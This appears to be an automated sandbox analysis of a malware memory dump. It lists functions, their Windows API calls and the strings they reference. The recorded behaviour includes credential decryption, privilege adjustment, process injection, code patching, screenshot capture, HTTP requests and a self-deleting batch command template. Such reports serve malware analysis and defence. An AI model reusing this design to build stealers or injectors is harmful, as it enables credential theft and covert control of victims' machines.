GetProcAddress.KERNEL32(?,?), ref: 00CDD4B5

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD9C8D, Relevance: 24.4, APIs: 10, Strings: 2, Instructions: 184

APIs

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CD9CCE
PathRemoveFileSpecW.SHLWAPI(?), ref: 00CD9D17
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CD9D3E
PathRemoveFileSpecW.SHLWAPI(?), ref: 00CD9D87
SetEvent.KERNEL32 ref: 00CD9D9A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CD9DAD

Part of subcall function 00CDE4B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CDE4E9
Part of subcall function 00CDE4B6: Sleep.KERNEL32(000001F4), ref: 00CDE57E

Part of subcall function 00CE44FB: FindFirstFileW.KERNEL32(?,?), ref: 00CE452C
Part of subcall function 00CE44FB: FindNextFileW.KERNEL32(?,?), ref: 00CE457E
Part of subcall function 00CE44FB: FindClose.KERNEL32 ref: 00CE4589
Part of subcall function 00CE44FB: SetFileAttributesW.KERNEL32(?,00000080), ref: 00CE4595
Part of subcall function 00CE44FB: RemoveDirectoryW.KERNEL32(?), ref: 00CE459C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CD9DF1

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

Part of subcall function 00CE10E0: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CE113B
Part of subcall function 00CE10E0: RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00CE11A5
Part of subcall function 00CE10E0: RegFlushKey.ADVAPI32(00000000), ref: 00CE11D3
Part of subcall function 00CE10E0: RegCloseKey.ADVAPI32(00000000), ref: 00CE11DA

CharToOemW.USER32(?,?), ref: 00CD9E6F
CharToOemW.USER32(?,?), ref: 00CD9E81
ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00CD9EEC

Part of subcall function 00CD5482: CharToOemW.USER32(?,?), ref: 00CD54C8
Part of subcall function 00CD5482: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00CD54FF
Part of subcall function 00CD5482: CloseHandle.KERNEL32(000000FF), ref: 00CD5527
Part of subcall function 00CD5482: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 00CD5569
Part of subcall function 00CD5482: memset.MSVCRT ref: 00CD557E
Part of subcall function 00CD5482: CloseHandle.KERNEL32(000000FF), ref: 00CD55B9

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00CD9CEB
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00CD9D5B

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD52FF, Relevance: 24.3, APIs: 8, Strings: 4, Instructions: 89

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 00CD530F
GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 00CD532D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00CD5339
memset.MSVCRT ref: 00CD5379
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 00CD53C6
CloseHandle.KERNEL32(?), ref: 00CD53DA
CloseHandle.KERNEL32(?), ref: 00CD53E0
FreeLibrary.KERNEL32 ref: 00CD53F4

Strings

userenv.dll, xrefs: 00CD5304
CreateEnvironmentBlock, xrefs: 00CD5327
DestroyEnvironmentBlock, xrefs: 00CD5333
D, xrefs: 00CD53BA

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF611F, Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 261

APIs

Part of subcall function 00CEC43C: lstrlenW.KERNEL32 ref: 00CEC443
Part of subcall function 00CEC43C: memcpy.MSVCRT ref: 00CEC4D1

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

getpeername.WS2_32(?,?,?), ref: 00CF6361

Part of subcall function 00CF306E: memcmp.MSVCRT ref: 00CF3090

lstrcpyW.KERNEL32(?,0:0), ref: 00CF63E9

Part of subcall function 00CF3C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00CF3C98
Part of subcall function 00CF3C83: StrCmpIW.SHLWAPI(?,?), ref: 00CF3CA2

Part of subcall function 00CF2755: EnterCriticalSection.KERNEL32(00D03510,?,00CF30AF,?,?,00000000), ref: 00CF2765
Part of subcall function 00CF2755: LeaveCriticalSection.KERNEL32(00D03510,?,00000000), ref: 00CF278F

WSAAddressToStringW.WS2_32(?,?,00000000), ref: 00CF63D5

Strings

mSER, xrefs: 00CF6176
hASS, xrefs: 00CF617D
U, xrefs: 00CF61F1
lYPE, xrefs: 00CF6279
~EAT, xrefs: 00CF6280
hASV, xrefs: 00CF6287
kTAT, xrefs: 00CF62C3
tIST, xrefs: 00CF62CA
0, xrefs: 00CF63C4
0:0, xrefs: 00CF63DF

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD5482, Relevance: 22.5, APIs: 6, Strings: 5, Instructions: 109

APIs

Part of subcall function 00CCE35B: GetTempPathW.KERNEL32(00000104,?), ref: 00CCE376
Part of subcall function 00CCE35B: PathAddBackslashW.SHLWAPI(?), ref: 00CCE3A0
Part of subcall function 00CCE35B: CreateDirectoryW.KERNEL32(?), ref: 00CCE457
Part of subcall function 00CCE35B: SetFileAttributesW.KERNEL32(?), ref: 00CCE468
Part of subcall function 00CCE35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00CCE481
Part of subcall function 00CCE35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00CCE492

CharToOemW.USER32(?,?), ref: 00CD54C8
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00CD54FF

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

CloseHandle.KERNEL32(000000FF), ref: 00CD5527
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 00CD5569
memset.MSVCRT ref: 00CD557E
CloseHandle.KERNEL32(000000FF), ref: 00CD55B9

Part of subcall function 00CCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00CCE82F
Part of subcall function 00CCE826: DeleteFileW.KERNEL32(?), ref: 00CCE836

Part of subcall function 00CCE348: CloseHandle.KERNEL32 ref: 00CCE354

Strings

.bat, xrefs: 00CD549C
@echo off%sdel /F "%s", xrefs: 00CD54D9
/c "%s", xrefs: 00CD5534
ComSpec, xrefs: 00CD5564
D, xrefs: 00CD559E

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF5C75, Relevance: 22.3, APIs: 6, Strings: 5, Instructions: 60

APIs

LoadLibraryW.KERNEL32(cabinet.dll), ref: 00CF5C89

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

GetProcAddress.KERNEL32(?,FCICreate), ref: 00CF5CB8
GetProcAddress.KERNEL32(?,FCIAddFile), ref: 00CF5CC7
GetProcAddress.KERNEL32(?,FCIFlushCabinet), ref: 00CF5CD6
GetProcAddress.KERNEL32(?,FCIDestroy), ref: 00CF5CE5

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

FreeLibrary.KERNEL32 ref: 00CF5D1A

Strings

cabinet.dll, xrefs: 00CF5C84
FCICreate, xrefs: 00CF5CB1
FCIAddFile, xrefs: 00CF5CBD
FCIFlushCabinet, xrefs: 00CF5CCC
FCIDestroy, xrefs: 00CF5CDB

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD357D, Relevance: 21.5, APIs: 12, Instructions: 144

APIs

Part of subcall function 00CD6861: memchr.MSVCRT ref: 00CD689D
Part of subcall function 00CD6861: memcmp.MSVCRT ref: 00CD68BC

VirtualProtect.KERNEL32(?,00CD37D4,00000080,?), ref: 00CD35ED
VirtualProtect.KERNEL32(?,00CD37D4,00000000,?), ref: 00CD3756

Part of subcall function 00CD6A7D: memcpy.MSVCRT ref: 00CD6A9C

Part of subcall function 00CD6B09: memcmp.MSVCRT ref: 00CD6B29

GetCurrentThread.KERNEL32 ref: 00CD36AC
GetThreadPriority.KERNEL32 ref: 00CD36B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 00CD36C6
Sleep.KERNEL32(00000000), ref: 00CD36CA
memcpy.MSVCRT ref: 00CD36D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00CD36EA
SetThreadPriority.KERNEL32 ref: 00CD36F2

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

GetTickCount.KERNEL32 ref: 00CD370D
GetTickCount.KERNEL32 ref: 00CD371A
Sleep.KERNEL32(00000000), ref: 00CD3727

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCCECC, Relevance: 21.3, APIs: 14, Instructions: 290

APIs

Sleep.KERNEL32(00003A98), ref: 00CCCEE3

Part of subcall function 00CD5AF5: InitializeCriticalSection.KERNEL32 ref: 00CD5AFC

InitializeCriticalSection.KERNEL32(?), ref: 00CCCF47
memset.MSVCRT ref: 00CCCF5E
InitializeCriticalSection.KERNEL32(?), ref: 00CCCF78

Part of subcall function 00CCFBE6: memset.MSVCRT ref: 00CCFBFD
Part of subcall function 00CCFBE6: memset.MSVCRT ref: 00CCFCD4

InitializeCriticalSection.KERNEL32(?), ref: 00CCCFD2
memset.MSVCRT ref: 00CCCFDD
memset.MSVCRT ref: 00CCCFEB

Part of subcall function 00CEFA0A: EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,00CCD004,00000000), ref: 00CEFB0C
Part of subcall function 00CEFA0A: LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,00CCD004,00000000), ref: 00CEFB4D
Part of subcall function 00CEFA0A: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CEFB5C
Part of subcall function 00CEFA0A: SetEvent.KERNEL32 ref: 00CEFB6C
Part of subcall function 00CEFA0A: GetExitCodeThread.KERNEL32(?,?), ref: 00CEFB80
Part of subcall function 00CEFA0A: CloseHandle.KERNEL32 ref: 00CEFB96

Part of subcall function 00CCBFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00CCC08A
Part of subcall function 00CCBFFE: GetHandleInformation.KERNEL32(?,?), ref: 00CCC09C
Part of subcall function 00CCBFFE: socket.WS2_32(?,00000001,00000006), ref: 00CCC0CF
Part of subcall function 00CCBFFE: socket.WS2_32(?,00000002,00000011), ref: 00CCC0E0
Part of subcall function 00CCBFFE: closesocket.WS2_32(00000002), ref: 00CCC0FF
Part of subcall function 00CCBFFE: closesocket.WS2_32 ref: 00CCC106
Part of subcall function 00CCBFFE: memset.MSVCRT ref: 00CCC1C8
Part of subcall function 00CCBFFE: memcpy.MSVCRT ref: 00CCC3C8

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

WaitForMultipleObjects.KERNEL32(?,?,00000000,0000EA60), ref: 00CCD061

Part of subcall function 00CD5B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,00CCD091,?,?,00000000,0000EA60,00000000), ref: 00CD5B48
Part of subcall function 00CD5B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 00CD5B6C
Part of subcall function 00CD5B40: CloseHandle.KERNEL32 ref: 00CD5B7C
Part of subcall function 00CD5B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00CCD091,?,?,00000000,0000EA60,00000000), ref: 00CD5BAC

Part of subcall function 00CCC41C: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00CCC44D
Part of subcall function 00CCC41C: WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00CCC4DF
Part of subcall function 00CCC41C: SetEvent.KERNEL32 ref: 00CCC532
Part of subcall function 00CCC41C: SetEvent.KERNEL32 ref: 00CCC56B
Part of subcall function 00CCC41C: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00CCC5F0

Part of subcall function 00CD229C: EnterCriticalSection.KERNEL32(?,?,?,?,?,00CCD154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 00CD22BD
Part of subcall function 00CD229C: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00CCD154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 00CD22D9

Part of subcall function 00CD3172: memset.MSVCRT ref: 00CD328F
Part of subcall function 00CD3172: memcpy.MSVCRT ref: 00CD32A2
Part of subcall function 00CD3172: memcpy.MSVCRT ref: 00CD32B8

Part of subcall function 00CF2D0B: accept.WS2_32(?,0000EA60), ref: 00CF2D2C
Part of subcall function 00CF2D0B: WSAEventSelect.WS2_32(?,00000000,00000000), ref: 00CF2D3E
Part of subcall function 00CF2D0B: WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00CCD163,?), ref: 00CF2D6F
Part of subcall function 00CF2D0B: shutdown.WS2_32(?,00000002), ref: 00CF2D87
Part of subcall function 00CF2D0B: closesocket.WS2_32 ref: 00CF2D8E
Part of subcall function 00CF2D0B: WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00CCD163), ref: 00CF2D95

Part of subcall function 00CCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00CCF82D

Part of subcall function 00CCC5FE: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,00CCD203,?,?,00000000,?,?,?,?,00000000), ref: 00CCC631
Part of subcall function 00CCC5FE: memcmp.MSVCRT ref: 00CCC67F
Part of subcall function 00CCC5FE: SetEvent.KERNEL32 ref: 00CCC6C0
Part of subcall function 00CCC5FE: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,00CCD203,?,?,00000000,?), ref: 00CCC6ED

Part of subcall function 00CD5C67: EnterCriticalSection.KERNEL32(00F51F44,?,?,00000001,00CE4EA8,?,?,00000001), ref: 00CD5C70
Part of subcall function 00CD5C67: LeaveCriticalSection.KERNEL32(00F51F44,?,00000001,00CE4EA8,?,?,00000001), ref: 00CD5C7A
Part of subcall function 00CD5C67: WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00CD5CA0
Part of subcall function 00CD5C67: EnterCriticalSection.KERNEL32(00F51F44,?,00000001,00CE4EA8,?,?,00000001), ref: 00CD5CB8
Part of subcall function 00CD5C67: LeaveCriticalSection.KERNEL32(00F51F44,?,00000001,00CE4EA8,?,?,00000001), ref: 00CD5CC2

CloseHandle.KERNEL32(?), ref: 00CCD260
CloseHandle.KERNEL32(?), ref: 00CCD26D

Part of subcall function 00CEFE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,00CEFB19,?,77C475F0,7C809F91,?,?,?,?,00CCD004,00000000), ref: 00CEFE4D
Part of subcall function 00CEFE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,00CEFB19,?,77C475F0,7C809F91,?,?,?,?,00CCD004,00000000), ref: 00CEFE84

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00CCD283

Part of subcall function 00CCFCFF: memset.MSVCRT ref: 00CCFD0F

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00CCD2A2
CloseHandle.KERNEL32(?), ref: 00CCD2AF
DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00CCD2B9

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CD5B10: CloseHandle.KERNEL32 ref: 00CD5B20
Part of subcall function 00CD5B10: DeleteCriticalSection.KERNEL32(?,?,00F51F38,00CE4EB9,?,?,00000001), ref: 00CD5B37

Part of subcall function 00CCCEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00CCCEB9

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD338D, Relevance: 20.3, APIs: 7, Strings: 3, Instructions: 143

APIs

GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 00CD33AB
GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 00CD33B6
GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 00CD33C1

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

lstrcmpiW.KERNEL32(?), ref: 00CD344E
memcpy.MSVCRT ref: 00CD3471

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00CD349C
memcpy.MSVCRT ref: 00CD34CA

Strings

GdipGetImageEncodersSize, xrefs: 00CD339C
GdipGetImageEncoders, xrefs: 00CD33AD
GdipSaveImageToStream, xrefs: 00CD33B8

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEB33E, Relevance: 20.3, APIs: 8, Strings: 2, Instructions: 107

APIs

memcpy.MSVCRT ref: 00CEB364
CreateFileMappingW.KERNEL32(000000FF,?,08000004,00000000,00001000,00000000), ref: 00CEB385
MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00001000), ref: 00CEB39D

Part of subcall function 00CEAF22: UnmapViewOfFile.KERNEL32 ref: 00CEAF2E
Part of subcall function 00CEAF22: CloseHandle.KERNEL32 ref: 00CEAF3F

memset.MSVCRT ref: 00CEB3F2
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00CEB42B

Part of subcall function 00CEAF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,00CFF128), ref: 00CEAF7C
Part of subcall function 00CEAF4A: DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 00CEAF9C
Part of subcall function 00CEAF4A: memset.MSVCRT ref: 00CEB039
Part of subcall function 00CEAF4A: memcpy.MSVCRT ref: 00CEB04B

ResumeThread.KERNEL32(?), ref: 00CEB44E
CloseHandle.KERNEL32(?), ref: 00CEB465
CloseHandle.KERNEL32(?), ref: 00CEB46B

Strings

-m%p, xrefs: 00CEB3CD
D, xrefs: 00CEB423

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD50C0, Relevance: 18.5, APIs: 8, Strings: 1, Instructions: 60

APIs

GetCurrentThread.KERNEL32 ref: 00CD50D4
OpenThreadToken.ADVAPI32 ref: 00CD50DB
GetCurrentProcess.KERNEL32 ref: 00CD50EB
OpenProcessToken.ADVAPI32 ref: 00CD50F2
LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00CD5113
AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00CD5128
GetLastError.KERNEL32 ref: 00CD5132
CloseHandle.KERNEL32(00000001), ref: 00CD5143

Strings

SeTcbPrivilege, xrefs: 00CD5106

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE0A9A, Relevance: 18.4, APIs: 8, Strings: 1, Instructions: 182

APIs

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CE0AD8
PathRemoveFileSpecW.SHLWAPI(?), ref: 00CE0B26

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

FindFirstFileW.KERNEL32(?,?), ref: 00CE0B93
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00CE0BEA
FindClose.KERNEL32 ref: 00CE0CF3

Part of subcall function 00CCE4C3: GetFileSizeEx.KERNEL32(?,?), ref: 00CCE4CE

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

SetLastError.KERNEL32(00000057,?), ref: 00CE0C5B

Part of subcall function 00CCE543: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00CCE555

CloseHandle.KERNEL32 ref: 00CE0C95

Part of subcall function 00CCE348: CloseHandle.KERNEL32 ref: 00CCE354

FindNextFileW.KERNEL32(?,?), ref: 00CE0CC9

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00CCE82F
Part of subcall function 00CCE826: DeleteFileW.KERNEL32(?), ref: 00CCE836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00CE0AFA

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCADFB, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184

APIs

GetLogicalDrives.KERNEL32 ref: 00CCAE0F

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

SHGetFolderPathW.SHELL32(00000000,00006024,00000000,00000000,?), ref: 00CCAE54
PathGetDriveNumberW.SHLWAPI(?), ref: 00CCAE66
lstrcpyW.KERNEL32(?,00CC75B0), ref: 00CCAE7A
GetDriveTypeW.KERNEL32(?), ref: 00CCAEE3
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000105), ref: 00CCAF44
CharUpperW.USER32(?), ref: 00CCAF60
lstrcmpW.KERNEL32(?), ref: 00CCAF83
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,?), ref: 00CCAFC1

Strings

#, xrefs: 00CCAE9E

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDF23B, Relevance: 16.5, APIs: 9, Instructions: 176

APIs

lstrlenW.KERNEL32 ref: 00CDF31C

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 00CDF389

Part of subcall function 00CF3D5A: memcpy.MSVCRT ref: 00CF3D94

LocalFree.KERNEL32(?), ref: 00CDF3A7
lstrlenW.KERNEL32(?), ref: 00CDF410

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

#6.OLEAUT32 ref: 00CDF432
#6.OLEAUT32(?), ref: 00CDF438
#6.OLEAUT32 ref: 00CDF43B
#6.OLEAUT32(?), ref: 00CDF441
#6.OLEAUT32 ref: 00CDF444

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE08C0, Relevance: 16.3, APIs: 7, Strings: 1, Instructions: 146

APIs

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

Part of subcall function 00CD6A7D: memcpy.MSVCRT ref: 00CD6A9C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CE0934
PathRemoveFileSpecW.SHLWAPI(?), ref: 00CE0982
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00CE09F8
GetLastError.KERNEL32(?,?,?,00000000,3D94878D), ref: 00CE0A05
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CE0A2F
FlushFileBuffers.KERNEL32 ref: 00CE0A49
CloseHandle.KERNEL32 ref: 00CE0A50

Part of subcall function 00CCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00CCE82F
Part of subcall function 00CCE826: DeleteFileW.KERNEL32(?), ref: 00CCE836

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00CE0956

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD8F66, Relevance: 16.3, APIs: 3, Strings: 5, Instructions: 75

APIs

Part of subcall function 00CD8E45: InternetCloseHandle.WININET ref: 00CD8E57

HttpOpenRequestA.WININET(?,?,?,HTTP/1.1,00000000,00CC7BD8,?,00000000), ref: 00CD8FA7
HttpAddRequestHeadersA.WININET(?,Connection: Close,00000013,A0000000), ref: 00CD8FCA
HttpSendRequestExA.WININET(?,?,00000000,00000000,00000000), ref: 00CD900C

Strings

HTTP/1.1, xrefs: 00CD8F8E
GET, xrefs: 00CD8F96
POST, xrefs: 00CD8F9B
Connection: Close, xrefs: 00CD8FC4
(, xrefs: 00CD9005

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF4181, Relevance: 16.2, APIs: 9, Instructions: 128

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CF41A1
Process32FirstW.KERNEL32(?,?), ref: 00CF41C6

Part of subcall function 00CEBE5A: CreateMutexW.KERNEL32(00D02974,00000001,?), ref: 00CEBEA0
Part of subcall function 00CEBE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00CEBEAC
Part of subcall function 00CEBE5A: CloseHandle.KERNEL32 ref: 00CEBEBA

OpenProcess.KERNEL32(00000400,00000000,?), ref: 00CF421D
CloseHandle.KERNEL32(?), ref: 00CF42E7

Part of subcall function 00CD500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00CD5020
Part of subcall function 00CD500E: GetTokenInformation.ADVAPI32(?,0000000C,00D02968,00000004,?), ref: 00CD5048
Part of subcall function 00CD500E: CloseHandle.KERNEL32(?), ref: 00CD505E

CloseHandle.KERNEL32 ref: 00CF423B
GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00CF4257
memcmp.MSVCRT ref: 00CF426F

Part of subcall function 00CD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00CD6A43
Part of subcall function 00CD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?), ref: 00CD6A56

Part of subcall function 00CF40CB: OpenProcess.KERNEL32(0000047A,00000000,?), ref: 00CF40DC
Part of subcall function 00CF40CB: CreateThread.KERNEL32(00000000,00000000,00CF40AB,?), ref: 00CF4132
Part of subcall function 00CF40CB: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CF413D
